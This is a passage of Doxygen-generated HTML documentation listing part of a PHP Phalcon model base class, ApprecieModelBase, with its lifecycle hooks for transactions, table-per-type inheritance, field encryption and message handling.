class="line"><a name="l00334"></a><span class="lineno"> 334</span>&#160; }</div> <div class="line"><a name="l00335"></a><span class="lineno"> 335</span>&#160; }</div> <div class="line"><a name="l00336"></a><span class="lineno"> 336</span>&#160; }</div> <div class="line"><a name="l00337"></a><span class="lineno"> 337</span>&#160;</div> <div class="line"><a name="l00342"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a49fed889a231292a2b9c9949c52de128"> 342</a></span>&#160; <span class="keyword">protected</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a49fed889a231292a2b9c9949c52de128">unsetBitValues</a>()</div> <div class="line"><a name="l00343"></a><span class="lineno"> 343</span>&#160; {</div> <div class="line"><a name="l00344"></a><span class="lineno"> 344</span>&#160; <span class="keywordflow">foreach</span> ($this-&gt;_bitFields as $field) {</div> <div class="line"><a name="l00345"></a><span class="lineno"> 345</span>&#160; <span class="keywordflow">if</span> ($this-&gt;$field instanceof RawValue) {</div> <div class="line"><a name="l00346"></a><span class="lineno"> 346</span>&#160; $val = $this-&gt;$field-&gt;getValue();</div> <div class="line"><a name="l00347"></a><span class="lineno"> 347</span>&#160; <span class="keywordflow">if</span> (is_numeric($val) &amp;&amp; $val == 0 || $val == 1) {</div> <div class="line"><a name="l00348"></a><span class="lineno"> 348</span>&#160; $this-&gt;$field = (int)$val;</div> <div class="line"><a name="l00349"></a><span class="lineno"> 349</span>&#160; }</div> <div class="line"><a name="l00350"></a><span class="lineno"> 350</span>&#160; }</div> <div class="line"><a name="l00351"></a><span class="lineno"> 351</span>&#160; }</div> <div class="line"><a name="l00352"></a><span class="lineno"> 352</span>&#160;</div> <div class="line"><a name="l00353"></a><span class="lineno"> 353</span>&#160; $this-&gt;_bitFields = array();</div> <div class="line"><a name="l00354"></a><span class="lineno"> 354</span>&#160; }</div> <div class="line"><a name="l00355"></a><span class="lineno"> 355</span>&#160;</div> <div class="line"><a name="l00363"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a70ec5ebfedc58756f409c37ad2df1deb"> 363</a></span>&#160; <span class="keyword">protected</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a70ec5ebfedc58756f409c37ad2df1deb">getExtractToArray</a>(array $fields)</div> <div class="line"><a name="l00364"></a><span class="lineno"> 364</span>&#160; {</div> <div class="line"><a name="l00365"></a><span class="lineno"> 365</span>&#160; $dataPackage = [];</div> <div class="line"><a name="l00366"></a><span class="lineno"> 366</span>&#160;</div> <div class="line"><a name="l00367"></a><span class="lineno"> 367</span>&#160; <span class="keywordflow">foreach</span> ($fields as $field) { <span class="comment">//toArray does not return the protected parent field data, so we extract</span></div> <div class="line"><a name="l00368"></a><span class="lineno"> 368</span>&#160; $getMethod = <span class="stringliteral">&#39;get&#39;</span> . ucfirst($field);</div> <div class="line"><a name="l00369"></a><span class="lineno"> 369</span>&#160; $dataPackage[$field] = $this-&gt;$getMethod();</div> <div class="line"><a name="l00370"></a><span class="lineno"> 370</span>&#160; }</div> <div class="line"><a name="l00371"></a><span class="lineno"> 371</span>&#160;</div> <div class="line"><a name="l00372"></a><span class="lineno"> 372</span>&#160; <span class="keywordflow">return</span> $dataPackage;</div> <div class="line"><a name="l00373"></a><span class="lineno"> 373</span>&#160; }</div> <div class="line"><a name="l00374"></a><span class="lineno"> 374</span>&#160;</div> <div class="line"><a name="l00375"></a><span class="lineno"> 375</span>&#160; <span class="keyword">protected</span> <span class="keyword">function</span> updateForeignKey(<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html">ApprecieModelBase</a> $parentInstance)</div> <div class="line"><a name="l00376"></a><span class="lineno"> 376</span>&#160; {</div> <div class="line"><a name="l00377"></a><span class="lineno"> 377</span>&#160; $getMethod = <span class="stringliteral">&#39;get&#39;</span> . ucfirst($this-&gt;getForeignKeyField());</div> <div class="line"><a name="l00378"></a><span class="lineno"> 378</span>&#160; $this-&gt;setForeignKey($parentInstance-&gt;$getMethod());</div> <div class="line"><a name="l00379"></a><span class="lineno"> 379</span>&#160; }</div> <div class="line"><a name="l00380"></a><span class="lineno"> 380</span>&#160;</div> <div class="line"><a name="l00381"></a><span class="lineno"> 381</span>&#160; <span class="keyword">protected</span> <span class="keyword">function</span> getParentInstance()</div> <div class="line"><a name="l00382"></a><span class="lineno"> 382</span>&#160; {</div> <div class="line"><a name="l00383"></a><span class="lineno"> 383</span>&#160; <span class="keywordflow">if</span> (!$this-&gt;_parentIsTableBase) <span class="keywordflow">return</span> null;</div> <div class="line"><a name="l00384"></a><span class="lineno"> 384</span>&#160;</div> <div class="line"><a name="l00385"></a><span class="lineno"> 385</span>&#160; $parent = get_parent_class(get_called_class());</div> <div class="line"><a name="l00386"></a><span class="lineno"> 386</span>&#160;</div> <div class="line"><a name="l00387"></a><span class="lineno"> 387</span>&#160; $instance = $parent::findFirstBy($this-&gt;getForeignKeyField(), $this-&gt;getForeignKey());</div> <div class="line"><a name="l00388"></a><span class="lineno"> 388</span>&#160;</div> <div class="line"><a name="l00389"></a><span class="lineno"> 389</span>&#160; <span class="keywordflow">if</span> ($instance == null) {</div> <div class="line"><a name="l00390"></a><span class="lineno"> 390</span>&#160; <span class="keywordflow">throw</span> new \LogicException($this-&gt;getForeignKeyField()</div> <div class="line"><a name="l00391"></a><span class="lineno"> 391</span>&#160; . <span class="stringliteral">&#39;The underlying base record or type &#39;</span></div> <div class="line"><a name="l00392"></a><span class="lineno"> 392</span>&#160; . $parent . <span class="stringliteral">&#39; could not be found using key field &#39;</span></div> <div class="line"><a name="l00393"></a><span class="lineno"> 393</span>&#160; . <span class="stringliteral">&#39; and key &#39;</span> . $this-&gt;getForeignKey());</div> <div class="line"><a name="l00394"></a><span class="lineno"> 394</span>&#160; }</div> <div class="line"><a name="l00395"></a><span class="lineno"> 395</span>&#160;</div> <div class="line"><a name="l00396"></a><span class="lineno"> 396</span>&#160; <span class="keywordflow">return</span> $instance;</div> <div class="line"><a name="l00397"></a><span class="lineno"> 397</span>&#160; }</div> <div class="line"><a name="l00398"></a><span class="lineno"> 398</span>&#160;</div> <div class="line"><a name="l00399"></a><span class="lineno"> 399</span>&#160; <span class="keyword">protected</span> <span class="keyword">function</span> calculateForeignKeyField()</div> <div class="line"><a name="l00400"></a><span class="lineno"> 400</span>&#160; {</div> <div class="line"><a name="l00401"></a><span class="lineno"> 401</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_parentIsTableBase &amp;&amp; $this-&gt;_foreignKeyField == null) {</div> <div class="line"><a name="l00402"></a><span class="lineno"> 402</span>&#160; $parent = get_parent_class(get_called_class());</div> <div class="line"><a name="l00403"></a><span class="lineno"> 403</span>&#160; $parentInstance = <span class="keyword">new</span> $parent();</div> <div class="line"><a name="l00404"></a><span class="lineno"> 404</span>&#160;</div> <div class="line"><a name="l00405"></a><span class="lineno"> 405</span>&#160; <span class="comment">//find the foreign key</span></div> <div class="line"><a name="l00406"></a><span class="lineno"> 406</span>&#160; $key = $parentInstance-&gt;getModelsMetaData()-&gt;getPrimaryKeyAttributes($parentInstance);</div> <div class="line"><a name="l00407"></a><span class="lineno"> 407</span>&#160;</div> <div class="line"><a name="l00408"></a><span class="lineno"> 408</span>&#160; <span class="keywordflow">if</span> (count($key) != 1) {</div> <div class="line"><a name="l00409"></a><span class="lineno"> 409</span>&#160; <span class="keywordflow">throw</span> <span class="keyword">new</span> Exception(<span class="stringliteral">&#39;TPT Inheritance only works with tables with a single primary key and a matching foreign key&#39;</span>);</div> <div class="line"><a name="l00410"></a><span class="lineno"> 410</span>&#160; }</div> <div class="line"><a name="l00411"></a><span class="lineno"> 411</span>&#160;</div> <div class="line"><a name="l00412"></a><span class="lineno"> 412</span>&#160; $this-&gt;_foreignKeyField = $key[0];</div> <div class="line"><a name="l00413"></a><span class="lineno"> 413</span>&#160; }</div> <div class="line"><a name="l00414"></a><span class="lineno"> 414</span>&#160; }</div> <div class="line"><a name="l00415"></a><span class="lineno"> 415</span>&#160;</div> <div class="line"><a name="l00416"></a><span class="lineno"> 416</span>&#160; <span class="keyword">protected</span> <span class="keyword">function</span> updateFromParent()</div> <div class="line"><a name="l00417"></a><span class="lineno"> 417</span>&#160; {</div> <div class="line"><a name="l00418"></a><span class="lineno"> 418</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_parentIsTableBase) {</div> <div class="line"><a name="l00419"></a><span class="lineno"> 419</span>&#160; $parent = $this-&gt;getParentInstance();</div> <div class="line"><a name="l00420"></a><span class="lineno"> 420</span>&#160; $this-&gt;assign($parent-&gt;toArray());</div> <div class="line"><a name="l00421"></a><span class="lineno"> 421</span>&#160; }</div> <div class="line"><a name="l00422"></a><span class="lineno"> 422</span>&#160; }</div> <div class="line"><a name="l00423"></a><span class="lineno"> 423</span>&#160;</div> <div class="line"><a name="l00424"></a><span class="lineno"> 424</span>&#160;<span class="preprocessor"> #endregion</span></div> <div class="line"><a name="l00425"></a><span class="lineno"> 425</span>&#160;</div> <div class="line"><a name="l00426"></a><span class="lineno"> 426</span>&#160;<span class="preprocessor"> #region event handlers / overrides</span></div> <div class="line"><a name="l00427"></a><span class="lineno"> 427</span>&#160;</div> <div class="line"><a name="l00428"></a><span class="lineno"> 428</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> onConstruct()</div> <div class="line"><a name="l00429"></a><span class="lineno"> 429</span>&#160; {</div> <div class="line"><a name="l00430"></a><span class="lineno"> 430</span>&#160; $this-&gt;useDynamicUpdate(<span class="keyword">true</span>);</div> <div class="line"><a name="l00431"></a><span class="lineno"> 431</span>&#160; }</div> <div class="line"><a name="l00432"></a><span class="lineno"> 432</span>&#160;</div> <div class="line"><a name="l00433"></a><span class="lineno"> 433</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> beforeValidationOnCreate()</div> <div class="line"><a name="l00434"></a><span class="lineno"> 434</span>&#160; {</div> <div class="line"><a name="l00435"></a><span class="lineno"> 435</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_parentIsTableBase) {</div> <div class="line"><a name="l00436"></a><span class="lineno"> 436</span>&#160;</div> <div class="line"><a name="l00437"></a><span class="lineno"> 437</span>&#160; $this-&gt;_parentTransaction = (new \Phalcon\Mvc\Model\Transaction\Manager())-&gt;<span class="keyword">get</span>();</div> <div class="line"><a name="l00438"></a><span class="lineno"> 438</span>&#160;</div> <div class="line"><a name="l00439"></a><span class="lineno"> 439</span>&#160; $parent = get_parent_class(get_called_class());</div> <div class="line"><a name="l00440"></a><span class="lineno"> 440</span>&#160; $parentInstance = <span class="keyword">new</span> $parent();</div> <div class="line"><a name="l00441"></a><span class="lineno"> 441</span>&#160;</div> <div class="line"><a name="l00442"></a><span class="lineno"> 442</span>&#160; $parentInstance-&gt;setTransaction($this-&gt;_parentTransaction);</div> <div class="line"><a name="l00443"></a><span class="lineno"> 443</span>&#160;</div> <div class="line"><a name="l00444"></a><span class="lineno"> 444</span>&#160; <span class="keywordflow">try</span> {</div> <div class="line"><a name="l00445"></a><span class="lineno"> 445</span>&#160; $data = $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a70ec5ebfedc58756f409c37ad2df1deb">getExtractToArray</a>($parentInstance-&gt;getModelsMetaData()-&gt;getAttributes($parentInstance));</div> <div class="line"><a name="l00446"></a><span class="lineno"> 446</span>&#160;</div> <div class="line"><a name="l00447"></a><span class="lineno"> 447</span>&#160; <span class="keywordflow">if</span> (!$parentInstance-&gt;create($data)) {</div> <div class="line"><a name="l00448"></a><span class="lineno"> 448</span>&#160; $this-&gt;appendMessage($parentInstance);</div> <div class="line"><a name="l00449"></a><span class="lineno"> 449</span>&#160; <span class="keywordflow">return</span> <span class="keyword">false</span>;</div> <div class="line"><a name="l00450"></a><span class="lineno"> 450</span>&#160; }</div> <div class="line"><a name="l00451"></a><span class="lineno"> 451</span>&#160;</div> <div class="line"><a name="l00452"></a><span class="lineno"> 452</span>&#160; $this-&gt;updateForeignKey($parentInstance);</div> <div class="line"><a name="l00453"></a><span class="lineno"> 453</span>&#160; } <span class="keywordflow">catch</span> (Exception $ex) {</div> <div class="line"><a name="l00454"></a><span class="lineno"> 454</span>&#160; $this-&gt;appendMessage($ex);</div> <div class="line"><a name="l00455"></a><span class="lineno"> 455</span>&#160; <span class="keywordflow">return</span> <span class="keyword">false</span>;</div> <div class="line"><a name="l00456"></a><span class="lineno"> 456</span>&#160; }</div> <div class="line"><a name="l00457"></a><span class="lineno"> 457</span>&#160; }</div> <div class="line"><a name="l00458"></a><span class="lineno"> 458</span>&#160;</div> <div class="line"><a name="l00459"></a><span class="lineno"> 459</span>&#160; $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ae1c6dd7fff21d9c67c959c33206d1e8b">decryptFields</a>();</div> <div class="line"><a name="l00460"></a><span class="lineno"> 460</span>&#160; $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a5def8bf996218c5f74920eef290b1a89">processDefaultValues</a>();</div> <div class="line"><a name="l00461"></a><span class="lineno"> 461</span>&#160; }</div> <div class="line"><a name="l00462"></a><span class="lineno"> 462</span>&#160;</div> <div class="line"><a name="l00463"></a><span class="lineno"> 463</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> beforeValidationOnUpdate()</div> <div class="line"><a name="l00464"></a><span class="lineno"> 464</span>&#160; {</div> <div class="line"><a name="l00465"></a><span class="lineno"> 465</span>&#160; $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ae1c6dd7fff21d9c67c959c33206d1e8b">decryptFields</a>();</div> <div class="line"><a name="l00466"></a><span class="lineno"> 466</span>&#160; }</div> <div class="line"><a name="l00467"></a><span class="lineno"> 467</span>&#160;</div> <div class="line"><a name="l00468"></a><span class="lineno"> 468</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> beforeUpdate()</div> <div class="line"><a name="l00469"></a><span class="lineno"> 469</span>&#160; {</div> <div class="line"><a name="l00470"></a><span class="lineno"> 470</span>&#160; $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#abf330a837c0889228c7b62bc18af99b5">encryptFields</a>();</div> <div class="line"><a name="l00471"></a><span class="lineno"> 471</span>&#160; $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a12751dcdf42f432256a7455df5c3a663">processBitValues</a>();</div> <div class="line"><a name="l00472"></a><span class="lineno"> 472</span>&#160;</div> <div class="line"><a name="l00473"></a><span class="lineno"> 473</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_parentIsTableBase) {</div> <div class="line"><a name="l00474"></a><span class="lineno"> 474</span>&#160; $this-&gt;_parentTransaction = (new \Phalcon\Mvc\Model\Transaction\Manager())-&gt;<span class="keyword">get</span>();</div> <div class="line"><a name="l00475"></a><span class="lineno"> 475</span>&#160; $parentInstance = $this-&gt;getParentInstance();</div> <div class="line"><a name="l00476"></a><span class="lineno"> 476</span>&#160;</div> <div class="line"><a name="l00477"></a><span class="lineno"> 477</span>&#160; $parentInstance-&gt;setTransaction($this-&gt;_parentTransaction);</div> <div class="line"><a name="l00478"></a><span class="lineno"> 478</span>&#160;</div> <div class="line"><a name="l00479"></a><span class="lineno"> 479</span>&#160; <span class="keywordflow">try</span> {</div> <div class="line"><a name="l00480"></a><span class="lineno"> 480</span>&#160; $data = $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a70ec5ebfedc58756f409c37ad2df1deb">getExtractToArray</a>($parentInstance-&gt;getModelsMetaData()-&gt;getAttributes($parentInstance));</div> <div class="line"><a name="l00481"></a><span class="lineno"> 481</span>&#160;</div> <div class="line"><a name="l00482"></a><span class="lineno"> 482</span>&#160; <span class="keywordflow">if</span> (!$parentInstance-&gt;update($data)) {</div> <div class="line"><a name="l00483"></a><span class="lineno"> 483</span>&#160; $this-&gt;appendMessage($parentInstance);</div> <div class="line"><a name="l00484"></a><span class="lineno"> 484</span>&#160; <span class="keywordflow">return</span> <span class="keyword">false</span>;</div> <div class="line"><a name="l00485"></a><span class="lineno"> 485</span>&#160; }</div> <div class="line"><a name="l00486"></a><span class="lineno"> 486</span>&#160; } <span class="keywordflow">catch</span> (Exception $ex) {</div> <div class="line"><a name="l00487"></a><span class="lineno"> 487</span>&#160; $this-&gt;appendMessage($ex);</div> <div class="line"><a name="l00488"></a><span class="lineno"> 488</span>&#160; <span class="keywordflow">return</span> <span class="keyword">false</span>;</div> <div class="line"><a name="l00489"></a><span class="lineno"> 489</span>&#160; }</div> <div class="line"><a name="l00490"></a><span class="lineno"> 490</span>&#160;</div> <div class="line"><a name="l00491"></a><span class="lineno"> 491</span>&#160; $this-&gt;setTransaction($this-&gt;_parentTransaction);</div> <div class="line"><a name="l00492"></a><span class="lineno"> 492</span>&#160; }</div> <div class="line"><a name="l00493"></a><span class="lineno"> 493</span>&#160; }</div> <div class="line"><a name="l00494"></a><span class="lineno"> 494</span>&#160;</div> <div class="line"><a name="l00495"></a><span class="lineno"> 495</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> beforeCreate()</div> <div class="line"><a name="l00496"></a><span class="lineno"> 496</span>&#160; {</div> <div class="line"><a name="l00497"></a><span class="lineno"> 497</span>&#160; $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#abf330a837c0889228c7b62bc18af99b5">encryptFields</a>();</div> <div class="line"><a name="l00498"></a><span class="lineno"> 498</span>&#160; $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a12751dcdf42f432256a7455df5c3a663">processBitValues</a>();</div> <div class="line"><a name="l00499"></a><span class="lineno"> 499</span>&#160;</div> <div class="line"><a name="l00500"></a><span class="lineno"> 500</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_parentIsTableBase) {</div> <div class="line"><a name="l00501"></a><span class="lineno"> 501</span>&#160; $this-&gt;setTransaction($this-&gt;_parentTransaction);</div> <div class="line"><a name="l00502"></a><span class="lineno"> 502</span>&#160; }</div> <div class="line"><a name="l00503"></a><span class="lineno"> 503</span>&#160; }</div> <div class="line"><a name="l00504"></a><span class="lineno"> 504</span>&#160;</div> <div class="line"><a name="l00505"></a><span class="lineno"> 505</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> afterCreate()</div> <div class="line"><a name="l00506"></a><span class="lineno"> 506</span>&#160; {</div> <div class="line"><a name="l00507"></a><span class="lineno"> 507</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_parentIsTableBase) {</div> <div class="line"><a name="l00508"></a><span class="lineno"> 508</span>&#160; <span class="keywordflow">try</span> {</div> <div class="line"><a name="l00509"></a><span class="lineno"> 509</span>&#160; $this-&gt;_parentTransaction-&gt;commit();</div> <div class="line"><a name="l00510"></a><span class="lineno"> 510</span>&#160; $this-&gt;updateFromParent();</div> <div class="line"><a name="l00511"></a><span class="lineno"> 511</span>&#160; } <span class="keywordflow">catch</span> (Exception $ex) {</div> <div class="line"><a name="l00512"></a><span class="lineno"> 512</span>&#160; $this-&gt;appendMessage($ex);</div> <div class="line"><a name="l00513"></a><span class="lineno"> 513</span>&#160; $this-&gt;_parentTransaction-&gt;rollback(<span class="stringliteral">&#39;The entire transaction could not completed&#39;</span>);</div> <div class="line"><a name="l00514"></a><span class="lineno"> 514</span>&#160; }</div> <div class="line"><a name="l00515"></a><span class="lineno"> 515</span>&#160; }</div> <div class="line"><a name="l00516"></a><span class="lineno"> 516</span>&#160; }</div> <div class="line"><a name="l00517"></a><span class="lineno"> 517</span>&#160;</div> <div class="line"><a name="l00518"></a><span class="lineno"> 518</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> beforeDelete()</div> <div class="line"><a name="l00519"></a><span class="lineno"> 519</span>&#160; {</div> <div class="line"><a name="l00520"></a><span class="lineno"> 520</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_parentIsTableBase) {</div> <div class="line"><a name="l00521"></a><span class="lineno"> 521</span>&#160; $this-&gt;_parentTransaction = (new \Phalcon\Mvc\Model\Transaction\Manager())-&gt;<span class="keyword">get</span>();</div> <div class="line"><a name="l00522"></a><span class="lineno"> 522</span>&#160;</div> <div class="line"><a name="l00523"></a><span class="lineno"> 523</span>&#160; $parent = $this-&gt;getParentInstance();</div> <div class="line"><a name="l00524"></a><span class="lineno"> 524</span>&#160; <span class="keywordflow">if</span> ($parent != null) {</div> <div class="line"><a name="l00525"></a><span class="lineno"> 525</span>&#160; $parent-&gt;setTransaction($this-&gt;_parentTransaction);</div> <div class="line"><a name="l00526"></a><span class="lineno"> 526</span>&#160; <span class="keywordflow">if</span> (!$parent-&gt;delete()) {</div> <div class="line"><a name="l00527"></a><span class="lineno"> 527</span>&#160; $this-&gt;appendMessage($parent);</div> <div class="line"><a name="l00528"></a><span class="lineno"> 528</span>&#160; <span class="keywordflow">return</span> <span class="keyword">false</span>;</div> <div class="line"><a name="l00529"></a><span class="lineno"> 529</span>&#160; }</div> <div class="line"><a name="l00530"></a><span class="lineno"> 530</span>&#160; }</div> <div class="line"><a name="l00531"></a><span class="lineno"> 531</span>&#160;</div> <div class="line"><a name="l00532"></a><span class="lineno"> 532</span>&#160; $this-&gt;setTransaction($this-&gt;_parentTransaction);</div> <div class="line"><a name="l00533"></a><span class="lineno"> 533</span>&#160; }</div> <div class="line"><a name="l00534"></a><span class="lineno"> 534</span>&#160; }</div> <div class="line"><a name="l00535"></a><span class="lineno"> 535</span>&#160;</div> <div class="line"><a name="l00536"></a><span class="lineno"> 536</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> afterDelete()</div> <div class="line"><a name="l00537"></a><span class="lineno"> 537</span>&#160; {</div> <div class="line"><a name="l00538"></a><span class="lineno"> 538</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_parentIsTableBase) {</div> <div class="line"><a name="l00539"></a><span class="lineno"> 539</span>&#160; <span class="keywordflow">try</span> {</div> <div class="line"><a name="l00540"></a><span class="lineno"> 540</span>&#160; $this-&gt;_parentTransaction-&gt;commit();</div> <div class="line"><a name="l00541"></a><span class="lineno"> 541</span>&#160; } <span class="keywordflow">catch</span> (Exception $ex) {</div> <div class="line"><a name="l00542"></a><span class="lineno"> 542</span>&#160; $this-&gt;appendMessage($ex);</div> <div class="line"><a name="l00543"></a><span class="lineno"> 543</span>&#160; $this-&gt;_parentTransaction-&gt;rollback(<span class="stringliteral">&#39;The entire transaction could not completed.&#39;</span>);</div> <div class="line"><a name="l00544"></a><span class="lineno"> 544</span>&#160; }</div> <div class="line"><a name="l00545"></a><span class="lineno"> 545</span>&#160; }</div> <div class="line"><a name="l00546"></a><span class="lineno"> 546</span>&#160; }</div> <div class="line"><a name="l00547"></a><span class="lineno"> 547</span>&#160;</div> <div class="line"><a name="l00548"></a><span class="lineno"> 548</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> afterFetch()</div> <div class="line"><a name="l00549"></a><span class="lineno"> 549</span>&#160; {</div> <div class="line"><a name="l00550"></a><span class="lineno"> 550</span>&#160; $this-&gt;_hash = null;</div> <div class="line"><a name="l00551"></a><span class="lineno"> 551</span>&#160; <span class="keywordflow">if</span> (count($this-&gt;_encryptedFields) &gt; 0) {</div> <div class="line"><a name="l00552"></a><span class="lineno"> 552</span>&#160; $this-&gt;_isDecrypted = <span class="keyword">false</span>;</div> <div class="line"><a name="l00553"></a><span class="lineno"> 553</span>&#160; }</div> <div class="line"><a name="l00554"></a><span class="lineno"> 554</span>&#160;</div> <div class="line"><a name="l00555"></a><span class="lineno"> 555</span>&#160; $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ae1c6dd7fff21d9c67c959c33206d1e8b">decryptFields</a>();</div> <div class="line"><a name="l00556"></a><span class="lineno"> 556</span>&#160; $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a49fed889a231292a2b9c9949c52de128">unsetBitValues</a>();</div> <div class="line"><a name="l00557"></a><span class="lineno"> 557</span>&#160;</div> <div class="line"><a name="l00558"></a><span class="lineno"> 558</span>&#160; $this-&gt;updateFromParent();</div> <div class="line"><a name="l00559"></a><span class="lineno"> 559</span>&#160; }</div> <div class="line"><a name="l00560"></a><span class="lineno"> 560</span>&#160;</div> <div class="line"><a name="l00561"></a><span class="lineno"> 561</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> afterUpdate()</div> <div class="line"><a name="l00562"></a><span class="lineno"> 562</span>&#160; {</div> <div class="line"><a name="l00563"></a><span class="lineno"> 563</span>&#160; $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a49fed889a231292a2b9c9949c52de128">unsetBitValues</a>();</div> <div class="line"><a name="l00564"></a><span class="lineno"> 564</span>&#160; $this-&gt;<a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#ae1c6dd7fff21d9c67c959c33206d1e8b">decryptFields</a>();</div> <div class="line"><a name="l00565"></a><span class="lineno"> 565</span>&#160;</div> <div class="line"><a name="l00566"></a><span class="lineno"> 566</span>&#160; <span class="keywordflow">if</span> ($this-&gt;_parentIsTableBase) {</div> <div class="line"><a name="l00567"></a><span class="lineno"> 567</span>&#160; <span class="keywordflow">try</span> {</div> <div class="line"><a name="l00568"></a><span class="lineno"> 568</span>&#160; $this-&gt;_parentTransaction-&gt;commit();</div> <div class="line"><a name="l00569"></a><span class="lineno"> 569</span>&#160; $this-&gt;updateFromParent();</div> <div class="line"><a name="l00570"></a><span class="lineno"> 570</span>&#160; } <span class="keywordflow">catch</span> (Exception $ex) {</div> <div class="line"><a name="l00571"></a><span class="lineno"> 571</span>&#160; $this-&gt;appendMessage($ex);</div> <div class="line"><a name="l00572"></a><span class="lineno"> 572</span>&#160; $this-&gt;_parentTransaction-&gt;rollback(<span class="stringliteral">&#39;The entire transaction could not completed&#39;</span>);</div> <div class="line"><a name="l00573"></a><span class="lineno"> 573</span>&#160; }</div> <div class="line"><a name="l00574"></a><span class="lineno"> 574</span>&#160; }</div> <div class="line"><a name="l00575"></a><span class="lineno"> 575</span>&#160; }</div> <div class="line"><a name="l00576"></a><span class="lineno"> 576</span>&#160;</div> <div class="line"><a name="l00577"></a><span class="lineno"> 577</span>&#160; <span class="keyword">public</span> <span class="keyword">function</span> appendMessage($messages)</div> <div class="line"><a name="l00578"></a><span class="lineno"> 578</span>&#160; {</div> <div class="line"><a name="l00579"></a><span class="lineno"> 579</span>&#160; <span class="keywordflow">if</span> (is_array($messages) || $messages instanceof \ArrayAccess) {</div> <div class="line"><a name="l00580"></a><span class="lineno"> 580</span>&#160; <span class="keywordflow">foreach</span> ($messages as $message) {</div> <div class="line"><a name="l00581"></a><span class="lineno"> 581</span>&#160; $this-&gt;appendMessage($message); <span class="comment">//recursion</span></div> <div class="line"><a name="l00582"></a><span class="lineno"> 582</span>&#160; }</div> <div class="line"><a name="l00583"></a><span class="lineno"> 583</span>&#160; } elseif ($messages instanceof PrivateMessageQueue) {</div> <div class="line"><a name="l00584"></a><span class="lineno"> 584</span>&#160; <span class="keywordflow">foreach</span> ($messages-&gt;getMessages() as $message) {</div> <div class="line"><a name="l00585"></a><span class="lineno"> 585</span>&#160; $this-&gt;appendMessage($message); <span class="comment">//recursion</span></div> <div class="line"><a name="l00586"></a><span class="lineno"> 586</span>&#160; }</div> <div class="line"><a name="l00587"></a><span class="lineno"> 587</span>&#160; } <span class="keywordflow">else</span> {</div> <div class="line"><a name="l00588"></a><span class="lineno"> 588</span>&#160; <span class="keywordflow">if</span> (is_string($messages)) {</div> <div class="line"><a name="l00589"></a><span class="lineno"> 589</span>&#160; $messages = <span class="keyword">new</span> Message($messages);</div> <div class="line"><a name="l00590"></a><span class="lineno"> 590</span>&#160; } elseif ($messages instanceof Exception) {</div> <div class="line"><a name="l00591"></a><span class="lineno"> 591</span>&#160; $messages = <span class="keyword">new</span> Message($messages-&gt;getMessage());</div> <div class="line"><a name="l00592"></a><span class="lineno"> 592</span>&#160; }</div> <div class="line"><a name="l00593"></a><span class="lineno"> 593</span>&#160;</div> <div class="line"><a name="l00594"></a><span class="lineno"> 594</span>&#160; parent::appendMessage($messages);</div> <div class="line"><a name="l00595"></a><span class="lineno"> 595</span>&#160; }</div> <div class="line"><a name="l00596"></a><span class="lineno"> 596</span>&#160; }</div> <div class="line"><a name="l00597"></a><span class="lineno"> 597</span>&#160;<span class="preprocessor"> #endregion</span></div> <div class="line"><a name="l00598"></a><span class="lineno"> 598</span>&#160;</div> <div class="line"><a name="l00599"></a><span class="lineno"> 599</span>&#160;<span class="preprocessor"> #region static methods</span></div> <div class="line"><a name="l00600"></a><span class="lineno"> 600</span>&#160;</div> <div class="line"><a name="l00611"></a><span class="lineno"><a class="line" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a8ad9b2acae885be4ba4613620165d579"> 611</a></span>&#160; <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">function</span> <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html#a8ad9b2acae885be4ba4613620165d579">findFirstBy</a>($field, $values, <a class="code" href="class_apprecie_1_1_library_1_1_model_1_1_apprecie_model_base.html">ApprecieModelBase</a> $instance = null)</div> <div class="line"><a name="l00612"></a><span class="lineno"> 612</span>&#160; {</div> <div class="line"><a name="l00613"></a><span class="lineno"> 613</span>&#160; $class = get_called_class();</div> <div class="line"><a name="l00614"></a><span 